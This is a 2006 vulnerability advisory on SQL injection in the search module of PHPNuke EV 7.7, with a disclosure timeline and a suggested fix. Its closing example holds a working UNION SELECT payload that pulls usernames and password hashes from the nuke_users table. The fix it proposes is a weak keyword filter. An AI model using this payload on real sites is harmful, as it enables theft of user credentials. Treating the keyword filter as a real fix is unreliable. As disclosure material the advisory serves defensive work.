############################################### PHPNuke EV 7.7 'search' module 'query' variable SQL injection Vendor url: http://nukevolution.com/ exploit available:yes vendor notify:yes advisore:http://lostmon.blogspot.com/2006/01/ phpnuke-ev-77-search-module-query.html ################################################ PHPNuke EV 7.7 have a flaw which can be exploited by malicious people to conduct SQL injection attacks. Input passed to the "query" parameter when performing a search isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. ################# versions: ################ PHPNuke EV 7.7 -R1 posible prior versions are afected. ################## solution: ################### No solution at this time!!! A posible fix: Open file modules/Search/index.php and after this code: ------------------------------------ require_once("mainfile.php"); $instory = ''; $module_name = basename(dirname(__FILE__)); get_lang($module_name); ---------------------------------------------- you can add this other : ------------------------------------ if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){ die(); } ---------------------------------------------- this is a "simple fix " only detect UNION SELECT comand and die if this is in the query variable... you can write the same code for UNION ALL SELECT or other varians of xploit #################### Timeline #################### discovered:21-11-2005 vendor notify:29-12-2005 (forums) vendor response:------- vendor fix:----- disclosure:09-01-2006 ################### example: ################### go to http://[Victim]/modules.php?name=Search and write in the search box this proof s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* all users hashes are available to view.. #################### €nd ######################## Thnx to estrella to be my ligth -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ -- La curiosidad es lo que hace mover la mente....